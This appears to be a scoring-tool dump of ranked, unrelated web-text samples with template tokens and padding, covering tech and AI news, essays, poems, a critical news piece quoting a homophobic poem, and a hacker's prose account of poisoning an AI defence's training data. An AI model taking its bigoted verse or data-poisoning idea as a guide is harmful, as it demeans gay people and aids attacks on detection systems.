IT and developer communities. "Open source" is a special category of software that is free for anyone to use and/or develop, regardless of copyright. + +Ubuntu is based on Linux, the same underlying code that powers data centres and household-name operating systems like Android. So the chances are you have actually used something powered by Ubuntu at some point in your life already, albeit indirectly. + +However, Ubuntu is not going to sit in the backroom forever. The company that makes it, Canonical, has been working on a mobile version of Ubuntu capable of taking on Google's Android system. That work that has born fruit this year with the arrival of the firm's flagship Meizu MX4 Ubuntu edition smartphone. + +Now, I'm sure most of you reading this article are asking "why should I care about Ubuntu phone?" + +The Holy Grail of technology + +I'll tell you why. Canonical is actually one of the most advanced and forward-looking companies when it comes to creating the Holy Grail of technologies, a "ubiquitous operating system." + +What does this mean? + +A ubiquitous operating system is a platform where all devices, regardless of whether they're a phone, tablet, smartwatch, smart thermostat or even smart traffic light, run using the same back-end technology and are able to talk to each other. You'll hear tech folks refer to this idea when they talk about the Internet of Things (IoT) or machine learning. + +If realised, this dream would make it so that things like our smartphones could not only detect but also predict and serve our needs without us having to lift a finger. + +The Ubuntu phone is a massive part of Canonical's plan to make this happen. It aims to completely rethink the way we interact with our smartphones and our smartphones interact with us. + +After a solid month using it, let me tell you, while there are some growing pains, Ubuntu's phone offering is a startling piece of technology that left me wishing our machine carers - and potential overlords - would arrive sooner. + +The Meizu MX4 Ubuntu Edition is currently only being sold in Europe as a promotional competition model. The competition requires people interested in buying the phone, which carries a +================================================================================ +Rank = 7; Score = 1499136.0 +<|begin_of_text|>Gigaom, Baidu Ventures and Comet Labs Angling for Piece of AI Pie + +Sam DeBrule Blocked Unblock Follow Following Mar 6, 2017 + +Two AI announcements worth noting from the end of last week. Comet Labs’s announced a partnership with Baidu Ventures and Gigaom will start offering AI-related consulting services. + +Let’s see how either could affect you. + +Comet Labs, an AI-focused VC firm and research lab that prides itself on offering services to startups “they can’t buy with money.” Basically, they can now offer startups access to Chinese partners and reduce the nightmare for startups working with manufacturers there. Baidu Ventures gets better access to the US startup market. + +Gigaom will be approaching the market from a different angle. Most companies are aware that “AI will transform everything–every business, every department, every job, everything,” but few people can tell you what AI or machine learning actually is or does. That’s where Gigaom will step in, with their plans to strategize, implement, build, and rollout AI projects alongside their clients. + +Join 11,000 readers and subscribe to the 🤖Machine Learnings🤖 newsletter to see how AI will impact your future. + +Have a friend working on an AI startup? Curious about how AI could actually help your larger company? Check out the full announcements:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 8; Score = 1351680.0 +<|begin_of_text|>Sarah Hassan of Somerville won the UMass Boston six-word story contest. + +“American? But what are you, really?” + +Sarah Hassan, a freshman at UMass Boston, read the poignant line to a campus center lounge packed nearly full of students and faculty on Wednesday, Nov. 7. It sounded like the beginning of poem, but it was already over. + +[an error occurred while processing this directive] + +Hassan’s “short story” was the winning entry for the school’s first ever six-word story contest. The contest, put together by UMass Boston’s creative writing department, was inspired by Ernest Hemingway’s legendary six-word story: “For sale: baby shoes, never worn.” + +“The challenge is to tell a complete story, with a sense of conflict, development and revelation,” said the school’s director of undergraduate creative writing, Tom O’Grady. “It’s amazing to be able to do that in six words.” + +Over 100 students emailed in their entries over the last couple months. Creative writing teachers whittled down the total of 212 super-short stories to 20 of the best that were read to an enthusiastic audience Wednesday. The writers of the top three stories received gift cards to the campus bookstore. + +Some of the entries were comical – “Ten items or less. Thirteen. Damnit.” Some were tragic – “Dear love, he’s back, I’m leaving.” And some were both – “Engagement ring, wedding ring, suffer ring.” + +They came from English majors and chemistry majors, from freshmen and seniors, and from serious writers who spent hours on their stories and those who participated because it was “easy.” + +Steeve Joazard (pictured above right), a senior English major, submitted a story that was chosen as one of the two runners-up: “Seeds don’t take in her garden.” + +“[The contest] seemed fun and interesting,” he said before the event started. “I worked on it for hours…it took up a good portion of my day.” + +Josh Weiss (pictured at left), +================================================================================ +Rank = 9; Score = 1335296.0 +<|begin_of_text|>In the report, titled "China's Rise in Artificial Intelligence," the investment bank said the world's second-largest economy has emerged as a major global contender in using AI to drive economic progress. + +Goldman said the government and companies have identified AI and machine learning as the next big areas of innovation. + +"We believe AI technology will become a priority on the government's agenda, and we expect further national/regional policy and funding support on AI to follow," the bank said. + +AI is already widespread: From simple smartphone applications that can tell the weather to complex algorithms that are able to easily beat humans in board games. + +Companies such as Google and Microsoft have poured vast amounts of money into research and development to expand the horizon of what AI can achieve. Machines are fed large quantities of data and taught specific tasks, allowing companies to create software that can learn and become smarter. + +While the United States is generally considered to be leading the field, other countries are catching up. China, home of internet powerhouses such as Baidu, Alibaba and Tencent, is one of them. + +In July, China's State Council issued guidelines on developing AI inside the country and set a goal of becoming a global innovation center for it by 2030. It expects the total output value of AI industries to surpass 1 trillion yuan ($147.80 billion). + +The Council encouraged the creation of open-source computing platforms and training more AI professionals and scientists. The guidelines said the government will invest in qualified AI projects and encourage private capital investment.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 10; Score = 1327104.0 +<|begin_of_text|>“Black people are hard. They don’t feel pain the way you do.” Teju Cole tweeted this yesterday, along with a link to an article on Slate from last June, “I Don’t Feel Your Pain,” in which the topic of empathy was explored in relation to America’s ongoing racial disparities, and the ways in which lack of empathy strengthens them. In the essay, author Jason Silverstein writes, “for many people, race does matter, even if they don’t know it. They feel more empathy when they see white skin pierced than black. This is known as the racial empathy gap.” Multiple studies have confirmed that people—all races, not just white people, and all education levels and professions, including medical personnel—”assume black people feel less pain than white people.” Silverstein explains that this has led to situations where “because they are believed to be less sensitive to pain, black people are forced to endure more pain,” including, but not limited to, receiving less anesthesia and pain medication than they would if they were white. Beyond this disparate treatment in the world of healthcare, it is believed that this racial empathy gap is at least partially responsible for the vast difference in prison sentences handed down to black men and women in comparison with those given to white people convicted of the same crimes. And because, remarkably, this empathy gap, this internalized assumption that black people, as Cole put it, “don’t feel pain the way you do,” is actually employed by people of every race and of every class, it can’t be shrugged off as something that only the most vile racists think or feel. It’s a systemic problem that, Silverstein concludes, needs to be addressed by “perspective-taking exercises” and “empathy induction” in order to combat the stereotypes that are engrained in most of us. + +But so, Cole wasn’t the only one with empathy on the brain. An editorial in the New York Times, “Rich People Just Care Less,” also addressed the empathy gap, only instead of looking at it in racial terms, it was explored by looking at economic and class differences, and how those effect who exactly Americans want to help. The fact that race, class, and economic privilege are all things that overlap is no coincidence, as the bottom line turns out to be that “research shows that people with the most social power pay scant attention to those with little such power.” The author of this piece, Daniel Goleman, believes that the rapidly rising economic inequality in this country is due to the fact that +================================================================================ +Rank = 11; Score = 1327104.0 +<|begin_of_text|>Portrait of the Artist's Mother, by Juan Gris + +When the digital media pioneer and visionary Jaron Lanier signs his new book, Who Owns The Future?, he circles the “Who” and draws an arrow to the reader’s name, achieving a visual haiku of his message: Each of us, by name, generates a great amount of profit for the Internet’s corporations as they use our personal information for targeted advertising or sell it to third-parties for future use. He wants to know what are we going to do about it. + +“Few people realize the degree to which they are being tracked and spied upon in order that this new form of currency can be created,” Lanier says. + +That currency is our private lives. + +In his May 3rd, 2013, talk at Brooklyn’s Powerhouse Arena, Lanier pointed out that social networking sites (such as Twitter, Facebook, Google, and LinkedIn) have not only changed the way we socialize and exchange ideas, they have also become information machines. Many perceive that these companies have merely given us new, free ways to stay in touch with friends or foster professional connectivity, but the reality is that this convenience comes with enormous costs: personal data collection. Lanier and others think the rapid shift to technological information consolidation and analysis of citizen identities, combined with the massive economic wealth of the companies, has big implications for individual privacy, and could also significantly influence the future of our political system. + +In a recent research project exploring the implications of this new reality on individuals, Alessandro Acquisti, a professor who does research on economics of privacy at Carnegie Mellon, showed how easy it is for digital technology to break through the walls around our personal lives. Using only an unknown person’s photograph, publicly available face recognition software (nowhere as sophisticated as Facebook, et al.), distributed computing, and information from social network sites, he could easily procure information including Social Security numbers, driver’s license numbers, and credit and debit card numbers—more than enough to commit identity theft. Our online personas and offline lives have merged, in what Acquisti says will soon be a seamless “augmented reality.” + +In his latest study, Silent Listeners: The Evolution of Privacy and Disclosure on Facebook, Acquisti and fellow authors found that more people than ever do everything they can online to keep their personal information private. However, the level of personal information disclosure has continued to rise due to strategic probing of our online social networks. Analysis of information about ourselves and our personal relationships allows social +================================================================================ +Rank = 12; Score = 1318912.0 +<|begin_of_text|>Image caption IBM's processors replicate the system of synaptic connections found in the human brain + +IBM has developed a microprocessor which it claims comes closer than ever to replicating the human brain. + +The system is capable of "rewiring" its connections as it encounters new information, similar to the way biological synapses work. + +Researchers believe that by replicating that feature, the technology could start to learn. + +Cognitive computers may eventually be used for understanding human behaviour as well as environmental monitoring. + +Dharmendra Modha, IBM's project leader, explained that they were trying to recreate aspects of the mind such as emotion, perception, sensation and cognition by "reverse engineering the brain." + +The SyNAPSE system uses two prototype "neurosynaptic computing chips". Both have 256 computational cores, which the scientists described as the electronic equivalent of neurons. + +One chip has 262,144 programmable synapses, while the other contains 65,536 learning synapses. + +Man machine + +In humans and animals, synaptic connections between brain cells physically connect themselves depending on our experience of the world. The process of learning is essentially the forming and strengthening of connections. + +A machine cannot solder and de-solder its electrical tracks. However, it can simulate such a system by "turning up the volume" on important input signals, and paying less attention to others. + +IBM has not released exact details of how its SyNAPSE processor works, but Dr Richard Cooper, a reader in cognitive science at Birkbeck, University of London said that it likely replicated physical connections using a "virtual machine". + +Instead of stronger and weaker links, such a system would simply remember how much "attention" to pay to each signal and alter that depending on new experiences. + +Image caption IBM's processor replicates the synaptic connections between neurons found in the brain + +"Part of the trick is the learning algorithm - how should you turn those volumes up and down," said Dr Cooper. + +"There's a a whole bunch of tasks that can be done just with a relatively simple system like that such as associative memory. When we see a cat we might think of a mouse." + +Some future-gazers in the cognitive computing world have speculated that the technology will reach a tipping point where machine consciousness is possible. + +However, Dr Mark Bishop, professor of cognitive computing at Goldsmiths, was more cautious. + +"[I] understand cognition to be something over and above a process simulated by the execution of mere computations, [and] see such claims as verging on the magical," he said. + +IBM's work +================================================================================ +Rank = 13; Score = 1302528.0 +<|begin_of_text|>I. The Back Door His name is not Opsec, but I will call him that to guard his privacy. In webspace he is known as a grand master of the dark art of hacking. He is one of a small elite—maybe a hundred, maybe fewer—all of whom are secretive and obsessed with security. They do not talk about their work with their families. They generally do not talk to the press. Nonetheless, through friends of friends, Opsec agreed to speak and to introduce me to his perspectives. In “meatspace,” as he and others like him call the real world, Opsec lives in a metropolitan area in a little wooden house by a railroad track. He is in his mid-30s, physically imposing, and not a geek. He hangs out in a local bar, where the regulars know vaguely that he works with computers. He is a fast talker when he’s onto a subject. His mind seems to race most of the time. Currently he is designing an autonomous system for detecting network attacks and taking action in response. The system is based on machine learning and artificial intelligence. In a typical burst of words, he said, “But the automation itself might be hacked. Is the A.I. being gamed? Are you teaching the computer, or is it learning on its own? If it’s learning on its own, it can be gamed. If you are teaching it, then how clean is your data set? Are you pulling it off a network that has already been compromised? Because if I’m an attacker and I’m coming in against an A.I.-defended system, if I can get into the baseline and insert attacker traffic into the learning phase, then the computer begins to think that those things are normal and accepted. I’m teaching a robot that ‘It’s O.K.! I’m not really an attacker, even though I’m carrying an AK-47 and firing on the troops.’ And what happens when a machine becomes so smart it decides to betray you and switch sides?” Opsec lives in a hall of mirrors. He understands that webspace and meatspace, though connected, remain largely distinct. Given sufficient motivation and time, Opsec can break into almost any secure network without setting off alarms. Breaking in used to thrill him, because once inside he could roam as he liked, but success comes too easily now: with such an attack, he has to find only a single way in. By contrast, defense presents the challenge of out-thinking every aggressor. This appeals +================================================================================ +Rank = 14; Score = 1179648.0 +<|begin_of_text|>The awful truth for Democrats: Trump learns and grows + +Conventional wisdom among the punditry had it that men in their seventies don't change, so President Trump's speechifying would never grow more sophisticated than the rabble-rousing populist they saw on the campaign trail. As usual, political writers, who do not understand what entrepreneurs do, have underestimated Donald Trump. His triumph last night in his first speech to a joint session of Congress has them cornered. People who build large and successful businesses and keep them growing are lifelong learners. Unexpected challenges require quick learning and assessment in order to formulate plans and supervise their execution. Donald Trump clearly learns as he goes. Any fair-minded look at his career reveals that he has mastered many complexities in building an evolving constellation of companies. He has done business in many countries, sells many different kinds of products, and is successful in multiple industries: real estate, television, branding, golf, and on and on. + +As a professor at Harvard Business School and then as a management consultant, I had the opportunity to work with a lot of CEOs, including many entrepreneurs. Nearly all were incredibly smart, picking up information and understanding its implications. They hired me or talked to me because they wanted to learn from my expertise. They were nearly all excellent at concentrated, focused learning. Maybe, sooner or later, the Democrats and their media coterie will realize that President Trump figures out what he needs to accomplish and behaves in ways he thinks will work. He is a strategic guy, which means he is thinking ahead. While his personality is vivid, it is also expressed in multiple modes, not just the angry demagogue seen by the fever-swamp left. He is used to playing various roles and is a gifted performer and communicator to a wide spectrum of the public. And most of all, he learns and he grows, and he gets the advice he can find, and then he learns from it.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 15; Score = 1138688.0 +<|begin_of_text|>The design of many robots has been inspired by living creatures, from the humanoid machines that have appeared in science fiction for decades to the mechanical cockroaches that scurry around some research labs. There has even been a robotic tuna used to explore the ocean. But our reliance on the mechanical has left a very large area of the animal kingdom left out: soft bodied creatures with neither skeletons nor shells. In a paper that will be released by PNAS, researchers describe a soft-bodied robot that can crawl around lab, powered by compressed air. + +The limits in robot design have been very practical. We don't yet have something that will mimic muscles well, which leaves our creations articulating their joints with things like gears and engines, which require a fairly rigid support structure. But the creators of this new robot were inspired by squid, which perform impressive feats of flexibility using a soft body that's supported by the ocean's buoyancy. + +They figured they could skip the buoyancy requirement by using a tough elastomer that can stand up to the force of gravity while still retaining enough flexibility to move around. In practical terms, their work required two elastomers, one that was able to stretch when put under an appropriate force, another that would flex, but not stretch. A chamber that had these elastomers on opposite surfaces would flex in a specific way when the chamber was pressurized, with stretching on only one side causing it to curve in the opposite direction. A series of theses chambers linked together could create the sort of "muscle" that would propel their creation. + +To create an actual robot, they fabricated a "tetrapod," with four limbs spreading out from a central body in a tall X shape. Each of the limbs could curve down when pressure was applied, and the "body" at the center of the X could either be held rigid or allowed to flex. + +Before you get images of a giant, rubbery X shambling down the street, we'll point out that the robot here was only about 15cm (six inches) long. On the plus side, that allowed it to move using only about a half-atmosphere of pressure—about 10 percent of what you'd find in a typical bike tire. The pressurized air was supplied externally through a set of flexible tubes, but there doesn't seem to be a reason that a small pump couldn't be carried along, though it might take much longer for it to move. + +The simplicity of the system also allowed it to be programmed with a remarkably low-tech approach: +================================================================================ +Rank = 16; Score = 1122304.0 +<|begin_of_text|>Neural networks’ powers of prediction have fueled the recent AI boom, but it can be hard to explain how they reach their decisions. A new technique aimed at uncovering the inner workings of language processing networks is just the latest effort to shed some light on these “black boxes.” + +It’s probably not surprising that we find neural networks so inscrutable, seeing as they are broadly based on the human brain, which we’re also struggling to decipher. The models they learn are not neatly stored as sequences of bits in a database like a conventional computer program, but in the weight of the connections between their thousands of virtual neurons. + +These weights are not set by a human programmer; instead, the neural network essentially programs itself by looking for patterns in reams of data. So while you can test how well a neural network detects cats in a photo, it’s tricky to tell what visual patterns it uses to determine their presence or absence. + +“When it comes to cat detection it’s not a major problem, but this technology is creeping into fields where being able to explain decisions could be important.” + +When it comes to cat detection it’s not a major problem, but this technology is creeping into fields where being able to explain decisions could be important, like financial trading and disease diagnosis. That has led to a growing body of research that’s trying to make the decisions of these algorithms more explainable. + +Earlier this month, MIT engineers unveiled a technique that promises to provide insight into any natural language processing network regardless of the underlying software. That’s because it works by simply varying the input into the algorithm and measuring the impact on the output. + +The group used their own neural network that compresses and decompresses natural sentences to come up with lists of closely-related sentences that can then be fed into the neural network being interrogated. By analyzing how slight variation in the input changed the output, the researchers are able to discover how the network reacts to particular words and phrases. + +One of the tests they conducted was on a translation service provided as part of Microsoft’s Azure cloud services. French has different forms of each noun depending on the gender of the subject. For instance, a male dancer is a “danseur” and female one is a “danseuse.” + +They found the model tended to show a preference for the masculine form in sentences containing occupations such as doctor or professor or adjectives such as smart or talented, while it chose the feminine form for charming, compassionate subjects who are dancers or nurses. + +This kind of gender bias would be hard to detect by simply scouring the +================================================================================ +Rank = 17; Score = 1105920.0 +<|begin_of_text|>'I saw the kiss by Michael Sam.. It made me mad–he kissed a man! + +This is not going to win any poetry prizes, unless it’s for ‘Most Bigoted Entry’. + +Evangelist and apparent amateur poet Peter LaBarbera has released a new work attacking gay athlete Michael Sam. + +It is titled ‘I Saw the Kiss by Michael Sam. It Made Me Mad. He Kissed a Man!’ (Hardly ‘Shall I compare thee to a summer’s day?’ is it?). + +It is in ‘tribute’ to the gay athlete when he learned he would become the first openly LGBTI player to be drafted into the NFL. + +When he learned the news he was in the St. Louis Rams, the kiss he gave his boyfriend Vito Cammisano went viral around the world. + +Having spent months, clearly, working on the poem, LaBarbera has finally released his full rhyming thoughts on the subject on his website. + +Note the couplet in which ‘gayness’ is rhymed with ‘anus’. Beautiful. + +I saw the kiss by Michael Sam.. + +It made me mad–he kissed a man! + +That’s something I don’t want to see + +It’s wrong, unnatural, and it’s not just me. + +Many now say, ‘Homosexuality is OK.’ + +But God says there’s a better way. + +He made men for women, and women for men. + +So why are ‘gays’ so prideful then? + +Please, no public same-sex kisses, Michael Sam. + +We don’t want to see this man-on-man! + +Not in a boat, not in a car + +This public perversion goes too far! + +Not in the store or on a bus + +This same-sex stuff, it brings disgust. + +Not at the movies or on TV + +It’s wrong, unnatural, can’t you see?! + +I don’t want my kids to think it’s right + +So please, please, keep it out of sight! + +Why is it always in our faces? + +This sin–celebrated in so many places? + +Even at football and baseball games + +We have to pretend homosexuality’s the same. + +Young kids exposed to same-sex acts, + +When parents just wanna’ have fun and relax. + +‘Well,’ said Michael Sam, ‘let me ask you this: + +‘Do you get mad when men and women kiss?!’ + +Man and woman, that’s Nature’s way. + +As long as there’s not too much PDA. + +‘But can’t you see, it’s who I am?! + + +================================================================================ +Rank = 18; Score = 1097728.0 +<|begin_of_text|>I fell + +The flowers wrap around my body + +Teetering on the edge of death + +I’m in a world forgotten by most + +I met the mother of many, + +She taught me and I spoke. + +She fell + +The glow of my mistake shook me. + +Cold bit my nose and finger tips + +I was no longer alone with my thoughts + +And my thoughts’ thoughts. + +Brothers of bone eased my fears. + +Snow fell + +But I found warmth in my new friends + +Spicy, startling, creeping fate, + +In serenity and solitude she found me, + +The warrior destined to save them + +Like a fish out of water, I ran. + +Drops fell + +Off my brow and out of my hand. + +Two pairs of hands reach out for me now, + +They were opposites in almost every way, + +One flesh, meek, and seemed to be helping, + +One metal, flashy, and more interested in performing. + +Parts fell + +But she could put him back together. + +Souls collected, I am the last one, + +Please don’t make me do this! + +My hands shook as the knife carved like magic, + +I was filled with uncertainty + +He fell + +But not a soul went to waste + +The flowers wrapped around their bodies + +A transformation of a child’s dream strung me in place + +My new friends were lost, now found, + +Love and grief filled the holes + +It fell. + +After not seeing the sun the horizon inspired joy. + +But, + +The flowers stacked inside their body + +They fell. + +Unfair, the sacrifice did not save them, + +But I can save them. Now or however many more times, + +I’m not the angel, they’re not the demon, + +We’re kids with horror in common. + +I fell. + +I fell. + +I fell. + +I fell. + +What were those feelings again? + +I fell. + +I fell. + +I + +f + +e + +l + +l + +. + +I fell + +I fell. + +The flowers wrap around my body. + +Teetering on the edge of death, + +I might have felt more dead than alive. + +But I must do it. + +I must allow myself to be saved.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 19; Score = 1089536.0 +<|begin_of_text|>Fun with Verbs and Nouns! + +I adore a door I abhor a bore I oppose a pose The ketchup will catch up The mustard must turd Here, I shall focus on a faux cus: A faux cus is a fake swear word, like, “diddlepoody”. I accrue a crew I attack a tack I can afford a Ford I acquire a choir My specialty is special tea + +And now, for some left over word oddities: + +Why do we write things down but 